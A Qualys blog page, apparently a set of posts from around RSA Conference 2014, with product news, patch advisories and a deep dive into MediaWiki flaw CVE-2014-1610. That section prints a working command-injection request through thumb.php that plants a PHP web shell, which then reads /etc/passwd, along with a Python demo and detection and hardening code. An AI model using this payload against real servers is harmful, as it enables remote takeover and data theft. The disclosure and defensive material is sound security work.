
Qualys Blogs


To help keep track of what happened at RSA Conference 2014, here's a quick list of Qualys' activities over the week:


Conference Events


New Blog Posts from Qualys Community

SSL Labs: Testing for Apple's TLS Authentication Bug: Updates to SSL Labs let you test for this newly-discovered (and now patched) bug.

MediaWiki DjVu and PDF File Upload Remote Code Execution Vulnerability: Deep-dive into only the third remote code execution vulnerability ever found to affect the MediaWiki platform.



QualysGuard Continuous Monitoring enables customers to continuously monitor mission-critical assets throughout their perimeter and immediately get alerted to anomalies that could expose them to cyber attacks.



QualysGuard Web Application Firewall offers rapid deployment of robust security for web applications with minimal cost of ownership, and is constantly updated with new rules to keep up with application updates and newly emerging threats.



Top 4 Security Controls helps organizations quickly determine if the PCs in their environments have properly implemented the Top 4 Critical Security Controls, which the Council on CyberSecurity estimates can help companies prevent 85% of cyber-attacks. The Top 4 Security Controls are released in collaboration with the SANS Institute and the Council on CyberSecurity.



2014 SC Magazine Awards




  • Risk I/O: For businesses that need to understand the vulnerability and threat risks of their organization’s perimeter in real-time, the new integration enables them to sync their vulnerability data with Risk I/O’s threat processing engine, allowing organizations to gain visibility into their most likely vector for a breach.
  • AlgoSec Partners: The integration provides visibility into the risk levels of data center applications, enabling IT and security teams to effectively communicate with business stakeholders so they can “own their risk” by quickly taking the actions needed to mitigate IT security issues.

Qualys is proud to announce that it was named Best Security Company earlier this week at the 2014 SC Magazine Awards. The awards acknowledge companies with superior security products that help customers tackle today’s most pressing information-technology (IT) challenges. The announcement was made on February 25, 2014 at the 17th annual SC Awards U.S. Gala in San Francisco, in conjunction with the annual RSA Conference. The criteria for the judging included: product line strength, customer base, customer service/support, research and development, and innovation.


“The SC Awards are the security industry’s most prestigious accolade, bestowed only to the most impressive companies in the security industry,” said Illena Armstrong, VP of editorial, SC Magazine. “Qualys can be very proud of this achievement and the many long hours of dedicated service that it represents.”


“We are honored to be named the Best Security Company by SC Magazine,” said Philippe Courtot, chairman and CEO, Qualys. “We share this honor with our customers and partners, who throughout the years, have been our guiding force to continue improving our existing cloud-based security and compliance solutions and design new innovative ones.”


Qualys also won the SC Award for Best Security Company in 2011. Read the full news release.


A new release of QualysGuard Portal, Version 2.3.0, is targeted for release to US production in March 2014. The exact release date has not yet been set. This release contains changes to the APIs that require a 30-day notification. Only API changes that impact existing APIs are included in the 30-day notification; the notification will be updated to include any new API functionality at least 15 days prior to release.


AM v1 API Changes


In the Portal 2.3.0 release the VM v1 API will remove the <SITE> and <NETWORK> objects in preparation for the new multiple network support feature. These objects were not used in the VM v1 API and there should be no impact to customers.


Full release notes will be available to customers on the day of the release.


Recently, details of an exploit targeting MediaWiki, the software that powers large-scale websites such as Wikipedia, were made public. What makes it noteworthy is that it is only the third remote code execution vulnerability ever to affect this open-source web platform. Discovered by Check Point vulnerability researchers, the vulnerability, CVE-2014-1610, affects MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11. Because it allows the attacker to compromise the underlying system, it is important to identify and patch affected systems.


Conditions Required to Exploit

Exploiting this vulnerability is tricky, as it is exploitable only under the following conditions:

  1. MediaWiki must have uploads enabled: $wgEnableUploads must be set to true.
  2. The .pdf and .djvu file types must be allowed via $wgFileExtensions, and the PdfHandler extension must be enabled.
  3. The user must be in a group with the "upload" right. By default this right is granted to all logged-in users.


Under a default configuration (even on older versions) the first two conditions are not met. Since MediaWiki 1.1, uploads have been disabled out of the box: $wgEnableUploads defaults to false, and the permitted file types are png, gif, jpg and jpeg only. DjVu has been natively supported since MediaWiki 1.8. File uploads and the PdfHandler extension are easy to enable, however, so the defaults are no guarantee.
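The conditions above turn into a quick triage for a fleet of wikis. The following is an added example, not code from the page or from MediaWiki: it reads a LocalSettings.php, works out whether uploads are enabled, whether pdf or djvu is allowed and whether PdfHandler is loaded, and compares the installed version with the fixed releases named above (1.22.2, 1.21.5, 1.19.11). The sample LocalSettings.php is constructed for the example, the function names are this example's own, and the third condition (the "upload" right, granted to logged-in users by default) is not checked. Branches the advisory does not name are reported as "unlisted" and, conservatively, not treated as fixed.

```python
"""Triage helper for CVE-2014-1610 (added example, not MediaWiki code)."""
import re

# Fixed release per branch, as stated in the advisory text.
FIXED_VERSIONS = {(1, 22): (1, 22, 2), (1, 21): (1, 21, 5), (1, 19): (1, 19, 11)}

# Constructed LocalSettings.php: uploads on, pdf added, PdfHandler loaded.
SAMPLE_LOCALSETTINGS = r'''<?php
# Exposed configuration (constructed for this example)
$wgEnableUploads = true;
$wgFileExtensions = array( 'png', 'gif', 'jpg', 'jpeg' );
$wgFileExtensions[] = 'pdf';
require_once( "$IP/extensions/PdfHandler/PdfHandler.php" );
$wgDebugLogFile = "/tmp/debug.log";
'''


def version_status(version: str) -> str:
    """'fixed', 'vulnerable', or 'unlisted' for branches the advisory does not name."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    fixed = FIXED_VERSIONS.get(parts[:2])
    if fixed is None:
        return "unlisted"
    return "fixed" if parts >= fixed else "vulnerable"


def parse_local_settings(text: str) -> dict:
    """Pull the three settings that matter out of LocalSettings.php.
    Deliberately simple: one statement per line, full-line comments only."""
    uploads, pdfhandler, exts = False, False, set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "//")):
            continue
        m = re.match(r"\$wgEnableUploads\s*=\s*(true|false)\s*;", line)
        if m:
            uploads = m.group(1) == "true"
            continue
        m = re.match(r"\$wgFileExtensions\s*=\s*array\s*\((.*)\)\s*;", line)
        if m:
            exts = {e.lower() for e in re.findall(r"['\"](\w+)['\"]", m.group(1))}
            continue
        m = re.match(r"\$wgFileExtensions\[\]\s*=\s*['\"](\w+)['\"]\s*;", line)
        if m:
            exts.add(m.group(1).lower())
            continue
        # require_once was the loader in 2014; wfLoadExtension is the newer one.
        if "PdfHandler" in line and ("require_once" in line or "wfLoadExtension" in line):
            pdfhandler = True
    return {"uploads": uploads, "extensions": exts, "pdfhandler": pdfhandler}


def assess(version: str, local_settings: str) -> dict:
    """Combine version and configuration into an exposure verdict."""
    cfg = parse_local_settings(local_settings)
    status = version_status(version)
    unmet = []
    if status == "fixed":
        unmet.append("version is patched")
    if not cfg["uploads"]:
        unmet.append("$wgEnableUploads is false")
    if not cfg["extensions"] & {"pdf", "djvu"}:
        unmet.append("neither pdf nor djvu is in $wgFileExtensions")
    if not cfg["pdfhandler"]:
        unmet.append("PdfHandler extension is not loaded")
    return {"version": status, "unmet": unmet, "exploitable": not unmet}


if __name__ == "__main__":
    for v in ("1.22.1", "1.22.2"):
        print(v, assess(v, SAMPLE_LOCALSETTINGS))
```

Run it against the real LocalSettings.php of each wiki together with the version from includes/DefaultSettings.php ($wgVersion); a wiki with an empty "unmet" list is the one to patch first.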



Figure 1: Configuration page for enabling file uploads


The LocalSettings.php file provides local configuration for a MediaWiki installation.



Figure 2: Configuration file, showing that uploads are disabled by default


How the Exploit Works

The vulnerability exists in the PdfHandler_body.php and DjVu.php source files, which fail to sanitize shell metacharacters. Shell metacharacters are characters that a Unix shell interprets specially rather than passing through as literal argument text. Examples are the backtick `, the pipe symbol |, the dollar sign $, the backslash \, the opening square bracket [, the question mark ? and the asterisk *.


MediaWiki does have a function, wfEscapeShellArg(), specifically for escaping such input. But through an apparent programming error, the handlers fail to apply it to certain parameters, such as the width and height used when creating a thumbnail of the uploaded file, so those values reach the shell unescaped. If file uploads and the PdfHandler extension are enabled, you will be presented with the following screen, with an Upload file link in the left column:



Figure 3: Example of MediaWiki page with file uploads enabled



After a .PDF file is uploaded, thumb.php creates and resizes the thumbnail images that are served when a web browser requests the file. PdfHandler is the handler thumb.php calls to render PDF files as images. You can call thumb.php with width, height and similar parameters to control the thumbnail dimensions:



Figure 4: An example of a thumbnail created by thumb.php



thumb.php hands each request to whichever media handler is registered for the file type. That is the key to this vulnerability: simply by passing shell metacharacters in its parameters, you can compromise the system.
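The flaw in miniature, as an added example that is not code from the page or from MediaWiki: build_command_vulnerable() assembles a gs | convert pipeline the way the debug log further down shows PdfHandler doing it, with every argument escaped except the width; build_command_hardened() validates the width as a bounded integer and escapes it as well. run_vulnerable_demo() executes the vulnerable pipeline through /bin/sh with an injected width. It does not need gs or convert to be installed, because the backtick substitution runs while the shell expands the command line, before either tool is started. The function names and the marker-file payload are this example's own; the original exploit wrote a PHP shell instead.

```python
"""Unescaped thumbnail width -> shell command execution (added example)."""
import os
import re
import shlex
import subprocess
import tempfile

SHELL_META = re.compile(r'[`$|;&<>(){}\[\]*?\\\'"\s]')
GS_PREFIX = ("gs -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 "
             "-r150 -dBATCH -dNOPAUSE -q")


def has_shell_metachars(value: str) -> bool:
    """True if a POSIX shell would treat any character in value specially."""
    return SHELL_META.search(value) is not None


def is_valid_width(width: str) -> bool:
    """A thumbnail width is a bounded positive integer and nothing else."""
    return re.fullmatch(r"[1-9][0-9]{0,4}", width) is not None


def build_command_vulnerable(pdf: str, width: str, out: str) -> str:
    """Paths are escaped, the width is pasted in raw: the page's bug."""
    return (f"{GS_PREFIX} {shlex.quote(pdf)} | "
            f"convert -depth 8 -resize {width} - {shlex.quote(out)}")


def build_command_hardened(pdf: str, width: str, out: str) -> str:
    """Reject anything that is not a width, then escape it anyway."""
    if not is_valid_width(width):
        raise ValueError(f"rejecting thumbnail width {width!r}")
    return (f"{GS_PREFIX} {shlex.quote(pdf)} | "
            f"convert -depth 8 -resize {shlex.quote(width)} - {shlex.quote(out)}")


def run_vulnerable_demo() -> bool:
    """Run the vulnerable pipeline with an injected width.
    Returns True if the injected command executed (the marker file appeared)."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "injected.txt")
        # Same shape as the page's payload: '|' ends the -resize argument and
        # the backticks run an arbitrary command (here a harmless file write).
        width = f"400|`echo injected > {shlex.quote(marker)}`"
        cmd = build_command_vulnerable("/var/www/mediawiki/images/4/41/Aisb08.pdf",
                                       width, os.path.join(tmp, "thumb.jpg"))
        # gs/convert failing to start is irrelevant: the substitution has
        # already run by the time the shell tries to exec them.
        subprocess.run(["/bin/sh", "-c", cmd], capture_output=True)
        return os.path.exists(marker)


if __name__ == "__main__":
    print("injection executed:", run_vulnerable_demo())
    print(build_command_hardened("/tmp/a.pdf", "400", "/tmp/a.jpg"))
```

The validation step matters more than the escaping: a width that is only ever digits cannot carry a metacharacter no matter how the command is later assembled, whereas escaping alone still relies on every call site remembering to do it.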


For demonstration purposes, I will be writing a trivial .php shell file that can execute commands. In Figure 5 below, the highlighted code is where I’m exploiting the width parameter w to write the one-liner <?php system($_GET[cmd]); into the file images/backdoor.php (the backslash in the request keeps the shell from expanding $_GET itself).



Figure 5: Exploit in action



Choosing a directory with relevant permissions is of importance here. In this case, we have written the shell in the /images folder:



Figure 6: Directory with backdoor.php installed by the attacker



Now you can run a command of your choice:



Figure 7: Oh no! The attacker can read the /etc/passwd file



What’s going on in the background?

MediaWiki has a very robust debugging environment that helps you debug anything: SQL errors, server errors, extension errors, etc. In this case, to understand what goes on behind the scenes, we simply add the following line to the LocalSettings.php file.


$wgDebugLogFile = "/tmp/debug.log";


When you set this directive, you see all that MediaWiki does behind the scenes. This event is of particular importance to us:


Start request GET /mediawiki/thumb.php?f=Aisb08.pdf&w=400|%60echo%20%22%3C?php%20system(\\$_GET[cmd]);%22%3Eimages/backdoor.php%60
HOST: localhost
FileBackendStore::getFileStat: File mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(/$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg does not exist.
User: cache miss for user 1
User: loading options for user 1 from database.
User: logged in from session
File::transform: Doing stat for mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg
PdfHandler::doTransform: ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki/images/4/41/Aisb08.pdf' | 'convert' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '/tmp/transform_d386f8960888-1.jpg') 2>&1
wfShellExec: /bin/bash '/var/www/mediawiki/includes/' '('\''gs'\'' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '\''/var/www/mediawiki/images/4/41/Aisb08.pdf'\'' | '\''convert'\'' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '\''/tmp/transform_d386f8960888-1.jpg'\'') 2>&1' 'MW_INCLUDE_STDERR=;MW_CPU_LIMIT=180; MW_CGROUP='\'''\''; MW_MEM_LIMIT=307200; MW_FILE_SIZE_LIMIT=102400; MW_WALL_CLOCK_LIMIT=180'


Here you see MediaWiki first checking whether the thumbnail already exists. PdfHandler is then invoked with the width pasted straight into the "-resize 400..." argument. Because it was never escaped, the | terminates the convert command and the backtick command substitution runs when wfShellExec hands the command line to /bin/bash. That is what writes the injected PHP shell into the /var/www/mediawiki/images/ folder.


End of story!
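The request line in the debug log above is also what a defender should be looking for. The following detection logic is an added example, not Qualys or MediaWiki code: it runs over constructed Apache access-log lines, URL-decodes the thumb.php query parameters that PdfHandler and DjVu pass towards a shell, and flags shell metacharacters in them, plus any request for a .php file under the upload directory, which should only ever hold images. The exploit request line is copied from the log on this page; the other lines, client addresses and timestamps are made up, and both heuristics are this example's own, not a Qualys signature.

```python
"""Spot CVE-2014-1610 abuse in web server access logs (added example)."""
import re
from urllib.parse import unquote

# Constructed sample: a normal thumbnail request, the exploit request from
# the page, the follow-up call to the dropped shell, and a normal page view.
SAMPLE_ACCESS_LOG = r'''
10.0.0.5 - - [28/Feb/2014:10:12:01 +0000] "GET /mediawiki/thumb.php?f=Aisb08.pdf&w=400 HTTP/1.1" 200 5123
10.0.0.9 - - [28/Feb/2014:10:13:44 +0000] "GET /mediawiki/thumb.php?f=Aisb08.pdf&w=400|%60echo%20%22%3C?php%20system(\\$_GET[cmd]);%22%3Eimages/backdoor.php%60 HTTP/1.1" 500 0
10.0.0.9 - - [28/Feb/2014:10:13:50 +0000] "GET /mediawiki/images/backdoor.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 2048
10.0.0.7 - - [28/Feb/2014:10:14:02 +0000] "GET /mediawiki/index.php?title=Main_Page HTTP/1.1" 200 9876
'''.strip()

CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+)')
SHELL_META = re.compile(r'[`$|;&<>(){}\[\]*?\\\'"\n]')
# thumb.php parameters that end up in the handler's shell pipeline
RISKY_THUMB_PARAMS = ("w", "width", "h", "height", "page")


def parse_query(query: str) -> dict:
    """Decode key=value pairs by hand: older parse_qs also splits on ';',
    which is part of the very payload we want to inspect."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def inspect_request(path: str) -> list:
    """Return the reasons (if any) a request path looks like CVE-2014-1610 abuse."""
    reasons = []
    url, _, query = path.partition("?")
    params = parse_query(query)
    if url.endswith("/thumb.php"):
        for name in RISKY_THUMB_PARAMS:
            value = params.get(name, "")
            if SHELL_META.search(value):
                reasons.append(f"shell metacharacters in thumb.php parameter {name}={value!r}")
    # The upload directory holds media, never executable PHP.
    if re.search(r"/images/.*\.php$", url):
        reasons.append(f"PHP script requested from upload directory: {url}")
    return reasons


def scan_access_log(text: str) -> list:
    """Return (client, path, reason) tuples for every suspicious line."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, _status, _size = m.groups()
        for reason in inspect_request(path):
            findings.append((client, path, reason))
    return findings


if __name__ == "__main__":
    for client, _path, reason in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{client}  {reason}")
```

The second heuristic is the one that survives an attacker who chooses a quieter payload: whatever was injected, the dropped file has to be fetched from the upload directory to be useful, and nothing legitimate asks for PHP there.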


QualysGuard detects this vulnerability with its BlindElephant engine, which identifies web application versions by static file fingerprinting. BlindElephant is a fast, accurate and very generic web application fingerprinter that identifies application and plugin versions from static files. A whitepaper on the static file fingerprinting technique gives more detail. Note that the BlindElephant engine included in QualysGuard is an advanced version with more features than the publicly available one.


How to Protect your MediaWiki Systems

What can you do to protect yourselves from such attacks?


The Apache process should have read-only access to the MediaWiki files; ownership and write permissions should belong to a separate user. For example, on many systems the Apache process runs as www-data:www-data. The www-data user should be able to read all of the files in your MediaWiki directory, either through group permissions or through "other" permissions, but it should not have write permission to the code in your MediaWiki directory. If you use features of MediaWiki that require the "files" directory, give the www-data user permission to write files only in that directory.
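An audit of that permission model, as an added example that is not from the page or from MediaWiki: it lists everything under a MediaWiki root that the web server could write but should not. It assumes the server runs as www-data, that www-data does not own the code tree (pass its uid as web_uid if it might, and owner-writable files are then flagged too), and that only the upload directory may be writable; images/ is used as that directory because it is where this page's exploit dropped its shell. The sample tree and its deliberate misconfigurations are constructed in a temporary directory.

```python
"""Find files the web server could modify outside the upload dir (added example)."""
import os
import stat
import tempfile

GROUP_OR_WORLD_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def audit_tree(root: str, upload_dir: str = "images", web_uid=None) -> list:
    """Return root-relative paths that www-data could write, outside upload_dir."""
    findings = []
    allowed = os.path.join(root, upload_dir)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if full == allowed or full.startswith(allowed + os.sep):
                continue  # uploads are allowed to be writable
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue  # a link's own mode bits mean nothing; its target is audited where it lives
            writable = bool(st.st_mode & GROUP_OR_WORLD_WRITABLE)
            if web_uid is not None and st.st_uid == web_uid:
                # If www-data owns the file, the owner bit is its bit too.
                writable = writable or bool(st.st_mode & stat.S_IWUSR)
            if writable:
                findings.append(os.path.relpath(full, root))
    return sorted(findings)


def build_sample_tree(root: str) -> None:
    """Constructed MediaWiki-like tree with two mistakes: LocalSettings.php
    and the includes/ directory are group-writable."""
    os.makedirs(os.path.join(root, "includes"))
    os.makedirs(os.path.join(root, "images"))
    for rel in ("LocalSettings.php", "thumb.php", "includes/Setup.php"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("<?php\n")
    os.chmod(os.path.join(root, "LocalSettings.php"), 0o664)   # wrong
    os.chmod(os.path.join(root, "thumb.php"), 0o644)           # right
    os.chmod(os.path.join(root, "includes"), 0o775)            # wrong
    os.chmod(os.path.join(root, "includes", "Setup.php"), 0o644)
    os.chmod(os.path.join(root, "images"), 0o775)              # allowed


def run_demo() -> list:
    """Build the sample tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return audit_tree(tmp)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path in audit_tree(sys.argv[1]):
            print("writable by web server:", path)
    else:
        print(run_demo())
```

A group-writable directory such as includes/ is worse than a single writable file: with it, the attacker can drop a new .php file rather than having to overwrite one that exists, which is exactly what happened with images/backdoor.php above.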


Among other steps, be sure to follow the MediaWiki security recommendations. Additionally, the MediaWiki Security Guide is a more comprehensive guide to set up your own MediaWiki server and write secure PHP and Javascript code that is easy to review and audit.


Qualys customers with VULNSIGS-2.2.644-1 and onwards will be alerted of this vulnerability via QID: 12832 - MediaWiki DjVu and PDF File Upload Remote Code Execution Vulnerability. Customers are advised to upgrade to MediaWiki versions 1.22.2, 1.21.5, 1.19.11 or later to remediate this vulnerability.


Earlier today I gave a presentation at RSA Conference 2014 in San Francisco about the 20 Critical Security Controls (CSC) and some ideas on how to implement them using QualysGuard. The document for the 20 CSC provides a number of suggestions for each control, called Quick Wins that point out aspects of the controls that are relatively easy to implement. One example is the detection of new machines, or how to report on machines that do not run an approved version of the operating system.


The presentation looks at how QualysGuard data can be used to answer these questions. We show how a script can access the QualysGuard API to pull down data and populate a database in a format that is then easily used to output the relevant reports. In our example we use Splunk as the database, mainly for its ease to treat time-based data, its intuitive query language and built-in reporting, alerting and graphing capabilities.


Please find the presentation attached. I would be very interested in hearing from you, especially if you have used solutions such as Splunk to enhance your reporting.


This week at RSA Conference 2014 in San Francisco, Qualys announced the general availability of QualysGuard Web Application Firewall.


QualysGuard WAF is designed to be *the* simple, scalable way to defend your web applications. Using virtual appliances running in either Amazon EC2 or VMware's vCenter platform, QualysGuard WAF sensors (which analyze traffic to and from your applications) can be deployed rapidly with a minimal level of security expertise. It uses a new approach to strong web app security that evolves and adapts to the changing threat environment.


New Approach: Describe Desired Security, Let the WAF Build the Rules


QualysGuard WAF can be configured and deployed in a matter of minutes in a true highly-available fashion - active/active cluster nodes are the norm, rather than the exception - and can be scaled horizontally to meet the needs of your organization and infrastructure.  Unlike other web application firewalls that require intricate sets of rules be specified for each app, QualysGuard WAF lets you define your desired level of security with just a few clicks. These security goals are automatically translated into the appropriate rules to use within the WAF sensor.


Figure 1


This not only makes robust security easy to set up, it also enables the protection of your applications to improve over time – without any extra effort from you. Qualys’s global security research team is constantly coming up with better defenses - these ongoing enhancements are deployed each month and urgent updates are added as needed to combat new exploits found in the wild. These additions are automatically used by QualysGuard WAF to dynamically update the rules used by each sensor.


Visual dashboards for an easy overview and interactive drill-down


QualysGuard WAF makes it easy to understand the security of all your applications at once. A concise, visual dashboard summarizes the various events that have occurred, when they took place, and where they came from to help you spot unusual patterns.


Figure 2


QualysGuard WAF categorizes each potential threat it detects according to a variety of attributes, including: the apps affected, severity, geographic location, source network address, how the threat was handled, and more. Interactive filters help you search for unexpected activity and determine how it impacts your applications.


Figure 3


You can then drill into particular events to learn more about them and how to address them:


Figure 4


We’re very excited to be making QualysGuard WAF generally available. We’re also continuing to enhance its feature set, driving tighter integration with your WAS results and providing better, more actionable security data to your teams. We're in Booth 2821 in Moscone North, so please feel free to stop by to discuss WAF and your needs, and to walk through our service and see how it truly is groundbreaking in scope.


In collaboration with the SANS Institute and the Council on CyberSecurity, Qualys today announced a new free service to help organizations implement the Top 4 Critical Security Controls to fend off attacks. The new service, available at, helps organizations quickly determine if the PCs in their environments have properly implemented the Top 4 Critical Security Controls, which the Council on CyberSecurity estimates can help companies prevent 85% of cyber-attacks.


Qualys will unveil this free service with representatives from the SANS Institute and the Council on Cyber Security at the RSA Conference Booth #2821 today at 11:30 am PT.


"The Qualys Top 4 service is an extremely elegant and effective solution that helps both small and large businesses determine how resilient they are to today's advanced threats,” said Jonathan Trull, CISO for the State of Colorado. “This is exactly the type of public-private partnership our country needs to address the cyber attacks threatening our economy and critical infrastructure."


“This is the first time that a major security vendor has implemented a scoring and reporting algorithm that allows organizations to compare themselves with peers,” said Alan Paller, director of research for the SANS Institute. “Scoring like this is the only technique I have ever seen that causes organizations to implement the changes that lead to effective security.”


Read the full announcement.


Today at RSA Conference, Qualys announced its new Continuous Monitoring service, empowering customers to continuously monitor mission-critical assets throughout their perimeter and immediately get alerted to anomalies that could expose them to cyber attacks. The service gives organizations the ability to proactively identify threats and unexpected changes in Internet-facing devices within their DMZ, cloud-based environments, and web applications before they are breached by attackers, bringing a new paradigm to vulnerability management.


"At, we have millions of visitors per month and many perimeter devices that we operate to secure against possible attacks,” said Deal Daly, VP of information technology for “The Qualys Continuous Monitoring service delivers real-time alerts of security and network configuration issues that we can proactively remediate.”


“The Cloud is expanding the boundaries of the corporate perimeter to include every browser, device or application that touches the Internet, leaving us more exposed to cyber-attacks than ever,” said Philippe Courtot, chairman and CEO for Qualys. “With our groundbreaking Continuous Monitoring service, companies can see their perimeter the way today’s hackers do, so that threats can be identified and addressed before they turn into breaches.”


Read the full release.


Qualys also announced today the general availability of its QualysGuard Web Application Firewall (WAF) service for web applications running in Amazon EC2 and on-premise. Deployed as a virtual image alongside web applications, the QualysGuard WAF can be set up and configured within minutes, enabling organizations to easily provide protection for their websites.


“Companies today are challenged with protecting their websites against attacks and complying with the Payment Card Industry (PCI) standard for transactions on their sites. But many organizations, especially smaller businesses, do not have the expertise or resources to effectively deploy WAFs,” said Charles Kolodgy, Research VP at IDC. “By introducing a lower cost, easy-to-use and deploy WAF cloud solution, Qualys can aid organizations in improving protection of their websites and web applications.”


The QualysGuard WAF cloud service provides rapid deployment of robust security for web applications with minimal cost of ownership, and it is constantly updated with new rules to keep up with application updates and newly emerging threats.


“Large organizations typically have thousands of web applications to protect, while smaller businesses don’t have the resources and IT staff to protect them,” said Philippe Courtot, chairman and CEO for Qualys. “The general availability of our WAF service will offer customers the flexibility they need to protect their applications no matter where they reside and whether they have a few or thousands of them.”


Read the full announcement.


Risk I/O announced today that it has partnered with Qualys to integrate QualysGuard Vulnerability Management (VM) into Risk I/O, providing perimeter vulnerability scanning for its customers. For businesses that need to understand the vulnerability and threat risks of their organization’s perimeter in real-time, the new integration enables them to sync their vulnerability data with Risk I/O’s threat processing engine, allowing organizations to gain visibility into their most likely vector for a breach.


“The addition of perimeter scanning to Risk I/O enables organizations to scan their organization’s perimeter and receive a complete risk analysis in a one stop shop so they can take action quickly and lower their risk of a breach,” said Risk I/O Co-founder and CEO Ed Bellis. “We are pleased to partner with Qualys and integrate our solutions together giving customers a comprehensive solution that will ultimately help them become more secure and avoid data breaches.”


Read the full announcement.


On Friday, Apple released patches for iOS 6.x and 7.x, addressing a mysterious bug that affected TLS authentication. Although no further details were made available, a large-scale bug hunt ensued. This post on Hacker News pointed to the problem, and Adam Langley followed up with a complete analysis.


I've just released an update for the SSL Labs Client Test, which enables you to test your user agents for this vulnerability.


This bug affects all applications that rely on Apple's SSL/TLS stack, which probably means most of them. Applications that carry with them their own TLS implementations (for example, Chrome and Firefox) are not vulnerable. For iOS, it's not clear when the bug had been introduced exactly. For OS X, it appears that only OS X 10.9 Mavericks is vulnerable.


What you should do:

  • iOS 6.x and 7.x: Patches are available, so you should update your devices immediately.
  • OS X 10.9.x: Apple initially only promised that a fix would be available soon; it has since been released in 10.9.2. Update immediately.

A new release of QualysGuard, Version 7.13, will be available in production on QualysGuard US Platform 1 on March 6, 2014. The deployment is scheduled to coincide with the currently scheduled maintenance window (QualysGuard US Platform 1 Maintenance Notification: March 6, 2014). The release will occur between 12:00 PM Pacific (20:00 UTC) and 12:00 AM Pacific the next day (08:00 UTC the next day).


QualysGuard VM and PC version 7.13 includes the following features:

Vulnerability Scorecard Report updates, New Compliance Scorecard Report, MS SQL Authentication – Auto Discover Database Instances, and multiple API enhancements (Ability to download API v2 CSV reports without headers, New HTTP Authentication options, New "Policy Merge” feature,  Policy Report XML now includes custom control references, Apache Authentication Support for multiple instances per host)


See QualysGuard 7.13 New Features and QualysGuard® 7.13 API Notification - 15 Day for more details.


To continue to receive notifications by email, please subscribe at US Platform 1


Qualys regularly upgrades the QualysGuard Cloud Platforms for capacity expansion and maintenance purposes.


We are now ready for a maintenance window that will allow Qualys to apply database and network enhancements to the EU Platform.


This upgrade will happen on March 13, 2014 and requires a 12-hour downtime starting at 19:00 UTC (8:00pm CET) and ending at 07:00 UTC (8:00am CET) next day.


Please note that none of the QualysGuard services on the EU Platform will be available during this maintenance window.  This includes:

  • QualysGuard Vulnerability Management
  • QualysGuard Policy Compliance
  • QualysGuard Web Application Scanning
  • QualysGuard Malware Detection Service
  • QualysGuard Asset Management, including Dynamic Asset Tagging


Any scans scheduled to begin during the downtime will start immediately following the scheduled downtime. Customers are advised to make sure that the restart of scheduled scans after the downtime does not interfere with normal network operations.


If your account has been enabled with New Scanner Services, your running scans will not be interrupted by this downtime and the results will be processed after service is returned.  If your account has not been enabled with the New Scanner Services, then any scans running at the start of the scheduled downtime will be canceled.


We appreciate your patience and if you have any further questions regarding this upgrade, please feel free to contact Qualys Technical Support at or +44 (0)1753 872102 (UK) or +33 1 41 97 35 81 (France) or +1 (866) 801-6161 (US and Canada).


We thank you for your continued support and look forward to your feedback.

Today Adobe released its second out-of-band update for Adobe Flash this month. APSB14-07 fixes three vulnerabilities in Flash, including CVE-2014-0502, which is being exploited in the wild through malicious web pages. The 0-day, CVE-2014-0502, was discovered about a week ago by FireEye, which reports finding it on three websites run by non-profit institutions. Fortunately, organizations running current operating systems and application versions are not affected by this particular attack: they lack the vulnerable components the exploit needs to succeed.


In particular the attack needs to bypass ASLR to be successful and therefore only focuses on certain configurations:


  • Windows XP (which does not have ASLR)
  • Windows 7 with Java 1.6 installed, which allows for an ASLR bypass; Java 1.6 is already EOL and in general vulnerable to other exploits
  • Windows 7 with a not fully updated version of Office 2007 or Office 2010, also vulnerable to other exploits


Our recommendation is to update as quickly as possible. Organizations running any of the above configurations need to do this immediately; others can roll out the patch on a normal schedule, but should be aware that attackers may switch tactics at any time to abuse other software packages that also leak memory locations.


Microsoft has updated advisory KB2755801 which centralizes the Flash updates in Internet Explorer 10 and 11. Users of IE10 or IE11, as well as Google Chrome do not need to update Adobe Flash separately, but instead it is handled through their browsers automatically.

Posted by qualys on Feb 19, 2014 in Qualys News

AlgoSec Partners with Qualys

AlgoSec, the market leader for Security Policy Management, and Qualys today announced their partnership to enable businesses to manage security and risk across their organizations. With the partnership, the latest version of the AlgoSec Security Management Suite includes integration with QualysGuard Vulnerability Management (VM) to aggregate and score vulnerabilities associated with data center applications and their associated physical or virtual servers. This provides customers with unprecedented visibility into the risk levels of data center applications, even as they change, enabling IT and security teams to effectively communicate with business stakeholders so they can “own their risk” by quickly taking the actions needed to mitigate IT security issues.


“Today’s cyber-attacks have a direct impact on the bottom line, yet organizations lack the visibility to manage risk from the business perspective,” said Yuval Baron, Chairman, President and CEO, AlgoSec. “By integrating QualysGuard VM with our solution, we are changing this paradigm to provide application-centric vulnerability management, allowing organizations to manage security in the context of business and at the speed of business.”


